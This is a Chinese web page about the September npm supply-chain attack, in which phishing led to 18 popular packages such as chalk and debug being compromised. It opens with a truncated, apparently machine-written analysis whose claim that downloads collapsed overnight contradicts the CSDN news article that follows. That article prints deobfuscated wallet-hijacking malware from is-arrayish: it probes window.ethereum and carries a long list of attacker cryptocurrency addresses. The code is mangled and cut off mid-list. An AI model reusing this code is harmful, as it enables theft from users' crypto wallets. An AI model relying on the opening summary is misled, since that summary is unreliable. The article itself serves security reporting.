這起事件確實(shí)令人震驚，也凸顯了NPM生態(tài)系統(tǒng)中存在的安全風(fēng)險(xiǎn)。讓我們來分析一下這個(gè)事件的關(guān)鍵點(diǎn)、可能的原因、影響以及可以采取的預(yù)防措施。
"事件回顧:"
"NPM包下載量暴跌:" 一個(gè)擁有26億次周下載量的主流NPM包，其下載量在一夜之間突然降至極低水平。 "開發(fā)者賬戶被盜:" 推測(cè)該NPM包的開發(fā)者賬戶遭到黑客釣魚攻擊，導(dǎo)致賬戶被盜。 "惡意代碼注入:" 黑客可能利用被盜賬戶將惡意代碼注入到NPM包中，或者修改了包的元數(shù)據(jù)，導(dǎo)致用戶無法正常下載或使用。
"可能的原因:"
1. "釣魚攻擊:" 這是最可能的原因。黑客通過釣魚郵件、偽造網(wǎng)站等手段，誘騙NPM包開發(fā)者點(diǎn)擊惡意鏈接，輸入用戶名和密碼，從而盜取開發(fā)者賬戶。 2. "賬戶安全意識(shí)薄弱:" 開發(fā)者可能使用了弱密碼，或者沒有啟用兩步驗(yàn)證，導(dǎo)致賬戶容易被黑客攻破。 3. "NPM平臺(tái)自身漏洞:" 雖然可能性較低，但不能完全排除NPM平臺(tái)自身存在安全漏洞，被黑客利用來攻擊開發(fā)者賬戶。
"影響:"
"開發(fā)者聲譽(yù)受損:" 開發(fā)者聲譽(yù)受到嚴(yán)重?fù)p害，用戶對(duì)其信任度下降。 "用戶代碼安全風(fēng)險(xiǎn):" 下載并使用了該NPM包的用戶，其

相關(guān)內(nèi)容：

編譯 | 蘇宓

出品 | CSDN（ID：CSDNnews）

短短一夜之間，NPM 軟件生態(tài)遭遇重創(chuàng)。黑客通過偽裝成官方通知的釣魚郵件，成功入侵知名開發(fā)者賬戶，對(duì)至少 18 個(gè)高頻下載的核心軟件包動(dòng)了手腳，并植入惡意代碼。這些包的周下載量合計(jì)超過 20 億次，而據(jù)外媒 BleepingComputer報(bào)道，實(shí)際數(shù)字甚至高達(dá) 26 億次，影響范圍幾乎覆蓋整個(gè) NPM 主流生態(tài)。

這一事件最早由網(wǎng)絡(luò)安全機(jī)構(gòu) Aikido 披露，其還對(duì)此次供應(yīng)鏈攻擊進(jìn)行了深度分析，引發(fā)了開發(fā)者和用戶的廣泛擔(dān)憂。

18 個(gè)主流 npm 軟件包遭入侵

根據(jù) Aikido公布的時(shí)間線顯示，9 月 8 日 13:16（UTC）左右，其情報(bào)系統(tǒng)發(fā)現(xiàn)一批推送到 npm 的軟件包存在可疑行為，疑似被植入惡意代碼。

受影響的軟件包共有 18 個(gè)，而且?guī)缀醵际窍螺d量巨大的核心依賴，包括：

• backslash（每周下載量 26 萬）

• chalk-template（每周下載量 390 萬）

• supports-hyperlinks（每周下載量 1920 萬）

• has-ansi（每周下載量 1210 萬）

• simple-swizzle（每周下載量 2626 萬）

• color-string（每周下載量 2748 萬）

• error-ex（每周下載量 4717 萬）

• color-name（每周下載量 1.917 億）

• is-arrayish（每周下載量 7380 萬）

• slice-ansi（每周下載量 5980 萬）

• color-convert（每周下載量 1.935 億）

• wrap-ansi（每周下載量 1.9799 億）

• ansi-regex（每周下載量 2.4364 億）

• supports-color（每周下載量 2.871 億）

• strip-ansi（每周下載量 2.6117 億）

• chalk（每周下載量 2.9999 億）

• debug（每周下載量 3.576 億）

• ansi-styles（每周下載量 3.7141 億）

篡改網(wǎng)頁上顯示的惡意代碼

進(jìn)一步來看，Aikido 發(fā)現(xiàn)，黑客在這些包新發(fā)布的版本中植入了一段惡意代碼。例如在is-arrayish中，就出現(xiàn)了這樣的情況。

從中可以看到 index.js 文件已被修改，并且包含混淆的代碼：

經(jīng)過一定程度的反混淆處理后，安全研究人員發(fā)現(xiàn)其中仍然包含一段相當(dāng)復(fù)雜的代碼。

var neth = 0;
var rund = 0;
var loval = 0;
asyncfunctioncheckethereumw {
try {
const _0x124ed3 = awaitwindow.ethereum.request({
'method': "eth_accounts"
});
if (_0x124ed3.length > 0) {
runmask;
if (rund != 1) {
rund = 1;
neth = 1;
newdlocal;
}
} elseif (rund != 1) {
rund = 1;
newdlocal;
}
} catch (_0x53a897) {
if (rund != 1) {
rund = 1;
newdlocal;
}
}
}
if (typeofwindow != "undefined" && typeofwindow.ethereum != "undefined") {
checkethereumw;
} elseif (rund != 1) {
rund = 1;
newdlocal;
}
functionnewdlocal {
const _0xba16ef = {
'zprkq': function (_0x23e86b, _0x5b593c) {
return _0x23e86b + _0x5b593c;
},
'iJAYR': function (_0xc91263, _0x20ad3a) {
return _0xc91263
},
'nqxhl': function (_0x31d70d, _0x545869) {
return _0x31d70d
},
'myaXd': function (_0xd587f7, _0x356cb8) {
return _0xd587f7 === _0x356cb8;
},
'IptyQ': function (_0x52d73c, _0x1701dc) {
return _0x52d73c - _0x1701dc;
},
'QCTBQ': function (_0x3b97a6, _0x5cd5e9) {
return _0x3b97a6 - _0x5cd5e9;
},
'avmeH': function (_0x370f68, _0x51151b) {
return _0x370f68 - _0x51151b;
},
'TwyPu': function (_0x43ced5, _0x54174b) {
return _0x43ced5 + _0x54174b;
},
'arczN': function (_0x2b592d, _0x5339ba) {
return _0x2b592d - _0x5339ba;
},
'yMgZR': function (_0xb3fb8a, _0x24a479) {
return _0xb3fb8a - _0x24a479;
},
'qEVKr': function (_0x4a3a26, _0x16853b) {
return _0x4a3a26 - _0x16853b;
},
'vGpiX': function (_0x9c66ab, _0x1a38b9, _0x1d740b) {
return _0x9c66ab(_0x1a38b9, _0x1d740b);
},
'eGWOd': function (_0x3630fa, _0x17694b) {
return _0x3630fa
},
'tfqRA': function (_0x562199, ..._0x1555b8) {
return _0x562199(..._0x1555b8);
},
'viQtk': "Content-Type",
'DSXar': "application/json",
'mDaWt': function (_0x2116fd, _0x26f622) {
return _0x2116fd(_0x26f622);
},
'FXtyf': function (_0x4f1346, _0x53343b) {
return _0x4f1346 === _0x53343b;
},
'FYAPh': "string",
'UmfJm': function (_0x301d56, _0x29139b) {
return _0x301d56 === _0x29139b;
},
'LmXxC': function (_0x467473, _0x5d7154) {
return _0x467473(_0x5d7154);
},
'yVHgJ': "responseText",
'aXpuC': "response",
'yArwb': "object",
'MJKcn': function (_0x5561bf, _0x1792e6) {
return _0x5561bf !== _0x1792e6;
},
'gHrJP': function (_0xe2c323, _0x4c49d0) {
return _0xe2c323 === _0x4c49d0;
},
'OiGzk': "1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx",
'EAhsy': "1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd",
'lLQUz': "1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP",
'ibPEr': "1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY",
'cGpnb': "1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj",
'wAGlT': "1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N",
'Hauzr': "1KkovSeka94yC5K4fDbfbvZeTFoorPggKW",
'nJNgC': "18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV",
'EHOlV': "1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP",
'cOZYT': "1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N",
'cIySf': "19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8",
'rrGeC': "1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR",
'geUVS': "1GX1FWYttd65J26JULr9HLr98K7VVUE38w",
'TZdxq': "14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC",
'JgcFw': "1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k",
'gKbQq': "19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg",
'KObJu': "16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X",
'vYGdx': "18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne",
'gtZOV': "1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8",
'ApfqP': "13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM",
'hgmsX': "1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS",
'TNgNB': "13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ",
'UhmAX': "154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn",
'vXyJx': "1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb",
'HmJHn': "19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn",
'UlhFZ': "17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS",
'VShzV': "16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH",
'IzSNV': "1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP",
'hiXcO': "143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp",
'gwsfo': "1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm",
'XjToi': "1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju",
'qzLJJ': "19onjpqdUsssaFKJjwuAQGi2eS41vE19oi",
'NrttU': "1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS",
'mLamd': "1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf",
'ENfnx': "1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6",
'teGcp': "1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z",
'lkQtS': "174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ",
'nVfSu': "17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p",
'XdmQg': "1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc",
'hTAuL': "13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a",
'hmVdI': "bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm",
'SvssU': "bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9",
'zXlNj': "bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx",
'OOAQz': "bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4",
'TDfnH': "bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar",
'UrAmA': "bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh",
'ELPqV': "bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h",
'xlnbk': "bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt",
'aApMn': "bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx",
'Pvsjl': "bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh",
'fmvYL': "bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq",
'fXywx': "bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f",
'RRxbR': "bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn",
'VrdPL': "bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4",
'qSKMT': "bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30",
'mbTQq': "bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7",
'xHmCb': "bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4",
'OqeMw': "bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6",
'BNnlw': "bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr",
'FkDWd': "bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79",
'aBdRe': "bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m",
'roief': "bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz",
'qMxmV': "bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu",
'kkYGi': "bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5",
'zbnSH': "bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf",
'dHxYm': "bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk",
'OfXMz': "bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st",
'OZznV': "bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u",
'NHzcN': "bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd",
'sxqWF': "bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u",
'oIQra': "bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp",
'qIAwe': "bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej",
'IneJW': "bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29",
'tjIgE': "bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq",
'vuJMD': "bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a",
'Uxzul': "bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my",
'MoAYB': "bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw",
'wKaGs': "bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55",
'VmOdy': "bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw",
'YcvKY': "bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037",
'FlhWy': "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976",
'sCKdW': "0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024",
'ZAiba': "0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B",
'AsHKD': "0x30F895a2C66030795131FB66CBaD6a1f91461731",
'rzrhZ': "0x57394449fE8Ee266Ead880D5588E43501cb84cC7",
'expPy': "0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A",
'zlBwY': "0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4",
'nElAL': "0xe86749d6728d8b02c1eaF12383c686A8544de26A",
'wqRjK': "0xa4134741a64F882c751110D3E207C51d38f6c756",
'HcYDT': "0xD4A340CeBe238F148034Bbc14478af59b1323d67",
'BqNRF': "0xB00A433e1A5Fc40D825676e713E5E351416e6C26",
'OvURa': "0xd9Df4e4659B1321259182191B683acc86c577b0f",
'PFfEj': "0x0a765FA154202E2105D7e37946caBB7C2475c76a",
'IOjJb': "0xE291a6A58259f660E8965C2f0938097030Bf1767",
'uKfqV': "0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D",
'DAJYA': "0xa7eec0c4911ff75AEd179c81258a348c40a36e53",
'SUVoY': "0x3c6762469ea04c9586907F155A35f648572A0C3E",
'WJmWS': "0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2",
'QBAXK': "0x51Bb31a441531d34210a4B35114D8EF3E57aB727",
'zLNIR': "0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1",
'kTQGi': "0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966",
'XJxSR': "0x1914F36c62b381856D1F9Dc524f1B167e0798e5E",
'kHjMo': "0xB9e9cfd931647192036197881A9082cD2D83589C",
'kxPDg': "0xE88ae1ae3947B6646e2c0b181da75CE3601287A4",
'gWISZ': "0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2",
'hIHlD': "0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68",
'QgItq': "0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d",
'bLJZU': "0x93Ff376B931B92aF91241aAf257d708B62D62F4C",
'IdVSI': "0x5C068df7139aD2Dedb840ceC95C384F25b443275",
'Rpwne': "0x70D24a9989D17a537C36f2FB6d8198CC26c1c277",
'NYUBp': "0x0ae487200606DEfdbCEF1A50C003604a36C68E64",
'eQrXq': "0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56",
'yRdVI': "0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673",
'IDnjA': "0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3",
'ajXoV': "0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769",
'xyHoE': "0xd299f05D1504D0B98B1D6D3c282412FD4Df96109",
'TCqKY': "0x241689F750fCE4A974C953adBECe0673Dc4956E0",
'dQfUy': "0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261",
'ctRhh': "0x5651dbb7838146fCF5135A65005946625A2685c8",
'JbMdu': "0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1",
'gjuIU': "0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3",
'fmDjk': "0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9",
'GjipQ': "0x013285c02ab81246F1D68699613447CE4B2B4ACC",
'wHLUW': "0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e",
'gYVeZ': "0x4Bf0C0630A562eE973CE964a7d215D98ea115693",
'Sqlrp': "0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb",
'pcqRS': "0xae9935793835D5fCF8660e0D45bA35648e3CD463",
'fMapR': "0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027",
'ITrjn': "0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D",
'Ixxxa': "0x06de68F310a86B10746a4e35cD50a7B7C8663b8d",
'DdqMx': "0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54",
'mddEm': "0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf",
'GQlpD': "0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272",
'PFPfJ': "0xe8749d2347472AD1547E1c6436F267F0EdD725Cb",
'rgsmH': "0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221",
'kkUbC': "0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3",
'qHwwv': "0xC4A51031A7d17bB6D02D52127D2774A942987D39",
'mlgET': "0xa1b94fC12c0153D3fb5d60ED500AcEC430259751",
'Sflwm': "0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223",
'cKcDU': "0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04",
'tWKKt': "5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6",
'GeUXv': "98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ",
'IFMoj': "Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt",
'shIUB': "CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN",
'IfmWW': "7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU",
'aLjQi': "3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49",
'ytLpw': "9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV",
'gjXjd': "4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF",
'alqyK': "9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL",
'tySZZ': "7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx",
'wEEzD': "8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv",
'PFTuz': "55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx",
'uMBVu': "Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB",
'gGKEH': "9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB",
'QlDwm': "5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr",
'PbcYH': "F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv",
'isJWQ': "G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn",
'NORtg': "DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K",
'OWMqm': "HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced",
'mAOhu': "TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67",
'zNJib': "TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y",
'JIaJy': "TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH",
'ycYrn': "TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc",
'YofCH': "TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp",
'iKJKA': "TGExvgwAyaqwcaJmtJzErXqfra66YjLThc",
'oQtxT': "TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG",
'Gnngl': "TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye",
'AIOZX': "TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp",
'LBXrZ': "TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR",
'GcWUu': "TPSLojAyTheudTRztqjhNic6rrrSLVkMAr",
'uWYHo': "TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo",
'AjRST': "TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw",
'OghhW': "TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f",
'WYxMs': "TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ",
'XPQAU': "TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb",
'kQfYh': "TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP",
'fQZCx': "TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW",
'UzPHF': "TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz",
'qJMvq': "TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW",
'sZVdB': "TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt",
'zzvgO': "TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC",
'maiTu': "TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ",
'ZpFNE': "THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E",
'jTVMz': "TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6",
'zBKSx': "TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L",
'CsfLH': "TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9",
'LCszu': "TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK",
'cdzQW': "TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V",
'xBxZT': "TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn",
'ESuTT': "TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA",
'emvMl': "TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt",
'xVGnF': "TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ",
'hxLhB': "TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs",
'EeQvC': "TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL",
'pELnW': "TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z",
'qzqrf': "THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5",
'ZjUWz': "TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP",
'LieOP': "TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7",
'pPSEL': "TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P",
'Cubxg': "LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug",
'tdnnB': "LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR",
'WBSil': "LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6",
'aiczm': "LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz",
'RVLCn': "LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa",
'UpXNN': "LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ",
'FOnBW': "LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT",
'iMpIh': "LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB",
'mynAv': "Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP",
'LthXt': "LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA",
'thBMJ': "Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP",
'SDnYd': "LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox",
'rsFGZ': "LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP",
'GERuP': "LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6",
'YnKTx': "LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ",
'qeLYC': "LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H",
'bHFpc': "LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq",
'yJtyM': "LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE",
'UthzI': "LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr",
'HRVKG': "LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9",
'DYFsg': "LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC",
'vJoTb': "LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v",
'SCttQ': "LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V",
'TLtwe': "LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR",
'zubSd': "LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg",
'jnPSm': "LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k",
'tkhoC': "LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk",
'UXYpW': "LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN",
'QtlzB': "Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT",
'wYQWn': "LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs",
'abbui': "LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw",
'zndLO': "LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X",
'kXpEP': "LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU",
'gBdKm': "LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq",
'AJBPj': "LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe",
'dDlKv': "LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV",
'upwRp': "LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ",
'wKEAH': "Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu",
'Kivgs': "LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK",
'atdgC': "LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z",
'wORrq': "bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh",
'AXcYN': "bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9",
'nJmrw': "bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz",
'jiCnV': "bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf",
'IEyeW': "bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39",
'LPwMj': "bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97",
'QeXkq': "bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823",
'AXCnW': "bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3",
'BvvIY': "bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64",
'WdGef': "bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8",
'MdtCY': "bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt",
'lcvXH': "bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er",
'jQkco': "bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz",
'XcaTu': "bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s",
'JEZmD': "bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7",
'PQrIR': "bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed",
'JDUWN': "bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw",
'CZKkU': "bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa",
'GGbBw': "bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc",
'TlKHF': "bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd",
'gvWhS': "bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl",
'TOyco': "bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g",
'uzHQJ': "bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf",
'Ddxxq': "bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u",
'SkKwK': "bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck",
'xlIOq': "bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3",
'cGdGB': "bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj",
'NJweA': "bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064",
'liySF': "bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7",
